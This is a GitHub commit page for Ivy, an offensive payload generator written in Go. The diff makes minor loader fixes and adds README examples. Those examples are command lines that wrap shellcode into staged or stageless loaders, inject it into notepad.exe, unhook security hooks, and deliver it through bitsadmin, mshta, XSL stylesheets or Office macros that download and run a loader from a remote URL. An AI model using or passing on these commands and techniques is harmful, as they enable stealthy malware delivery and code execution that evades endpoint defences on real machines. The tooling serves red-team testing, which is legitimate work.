Skip to content
This repository has been archived by the owner on Aug 18, 2023. It is now read-only.

Commit

Permalink
v1.11
Browse files Browse the repository at this point in the history
  • Loading branch information
@Tylous
Tylous committed Jan 28, 2022
1 parent 86bdd82 commit 5d96b43
Show file tree
Hide file tree
Showing 4 changed files with 79 additions and 4 deletions.
2 changes: 1 addition & 1 deletion Cryptor/Cryptor.go
View file
Original file line number Diff line number Diff line change
Expand Up @@ -69,6 +69,7 @@ func randclassid() string {
}

func VarNumberLength(min, max int) string {
time.Sleep(2 * time.Millisecond)
var r string
rand.Seed(time.Now().UnixNano())
num := rand.Intn(max-min) + min
Expand All @@ -79,7 +80,6 @@ func VarNumberLength(min, max int) string {

func StagelessArrayGen(data []byte) string {
var fmtStr string
//var StrSlice []string
aSlice := data
fmtStr = strings.Repeat("%d, ", len(aSlice)-1)
fmtStr += "%d"
Expand Down
4 changes: 3 additions & 1 deletion Ivy.go
View file
Original file line number Diff line number Diff line change
Expand Up @@ -91,10 +91,12 @@ Their cries for mercy?
if opt.inputFile32 == "" && opt.inputFile64 == "" {
log.Fatal("Error: Please provide a path to a file containing a raw shellcode or payload")
}

if opt.outFile == "" {
log.Fatal("Error: Please provide a name for the payload the you wish to generate")
}
if opt.CommandLoader == "" || opt.CommandLoader == "bits" || opt.CommandLoader == "hta" || opt.CommandLoader == "macro" || opt.CommandLoader == "xsl" {
log.Fatal("Error: Invalid delivery command option, please choose one of the acceptable options")
}
if opt.inputFile32 != "" && opt.stageless == false {
Utils.PrintDebug(debugging, "Reading payload file %s\n", opt.inputFile32)
rawinputfile32 := Utils.Readfile(opt.inputFile32)
Expand Down
5 changes: 3 additions & 2 deletions Loader/Loader.go
View file
Original file line number Diff line number Diff line change
Expand Up @@ -53,6 +53,7 @@ type macro struct {
type sandbox struct {
Variables map[string]string
}

var buffer bytes.Buffer

//First
Expand All @@ -71,7 +72,7 @@ func Java_Code_Buff(product string) (string, string, string, string, string, str
javacode.Variables["DecodedValue"] = Cryptor.VarNumberLength(4, 9)
javacode.Variables["shellcode"] = Cryptor.VarNumberLength(4, 9)
javacode.Variables["Auto_Open"] = Cryptor.VarNumberLength(4, 9)

if product == "Excel" {
struct_option = Struct.Javacode_Start_Excel()
}
Expand Down Expand Up @@ -403,7 +404,7 @@ func XSL_Code_Buff(compiled string) string {
xsl.Variables = make(map[string]string)
xsl.Variables["payload"] = compiled
buffer.Reset()
xslTemplate, err := template.New("xsl").Parse(Struct.HTA_Loader())
xslTemplate, err := template.New("xsl").Parse(Struct.XSL_Loader())
if err != nil {
log.Fatal(err)
}
Expand Down
72 changes: 72 additions & 0 deletions README.md
View file
Original file line number Diff line number Diff line change
Expand Up @@ -166,5 +166,77 @@ The delivery command line argument allows you to generate a command or string of
* Macro – This will generate an Office macro that can be put into an Excel or Word macro document. When this macro is executed, the loader will be downloaded from a remote source and executed, then removed.
* XSL - Generates a xsl stylesheet file containing the loader along with a one liner command execute the loader remotely.

# Examples

### Staged Inject payload


```
./Ivy -Ix64 test64.vba -Ix86 test32.vba -P Inject -O SampleInject.js
```

### Staged Local payload
```
./Ivy -Ix64 test64.c -Ix86 test32.c -P Local -O SampleLocal.js
```

### Stagless Local payload
```
./Ivy -stageless -Ix64 stageless64.bin -Ix86 stageless32.bin -P Local -O stageless.js
```

### Stagless Injected payload
```
./Ivy -stageless -Ix64 stageless64.bin -Ix86 stageless32.bin -P Inject -O stageless.js
```

### Stagless Injected payload spawning notepad.exe
```
./Ivy -stageless -Ix64 stageless64.bin -Ix86 stageless32.bin -P Inject -process64 C:\\windows\\system32\\notepad.exe -process32 C:\\windows\\SysWOW64\\notepad.exe -O stageless.js
```

### Unhooked Stagless Local payload
```
./Ivy -stageless -Ix64 stageless64.bin -Ix86 stageless32.bin -P Local -unhook -O stageless.js
```

### Unhooked Stagless Injected payload
```
./Ivy -stageless -Ix64 stageless64.bin -Ix86 stageless32.bin -P Inject -unhook -O stageless.js
```

## One Liner Commands Samples

### Non-Executable File Types

```
./Ivy -Ix64 stageless64.bin -Ix86 stageless32.bin -P Inject -O test.png -stageless
```

### Bitsadmin Command

```
./Ivy -Ix64 stageless64.bin -Ix86 stageless32.bin -P Local -O test.js -url http://ACME.com -delivery bits -stageless
```

### MSHTA.exe Command

```
./Ivy -Ix64 stageless64.bin -Ix86 stageless32.bin -P Local -O test.hta -url http://ACME.com -delivery hta -stageless
```


### Stylesheet Payload
```
./Ivy -Ix64 stageless64.bin -Ix86 stageless32.bin -P Local -O test.xsl -url http://ACME.com -delivery xsl -stageless
```


### Macro Web Downloader

```
./Ivy -Ix64 stageless64.bin -Ix86 stageless32.bin -P Local -O test.txt -url http://ACME.com/test.txt -delivery macro -stageless
```

# Known Issues
Currently there is a known issue with unhooking the remote injected process. A current work around is to load the [unhook](https://github.com/rsmudge/unhook-bof) BOF, for now.

0 comments on commit 5d96b43

Please sign in to comment.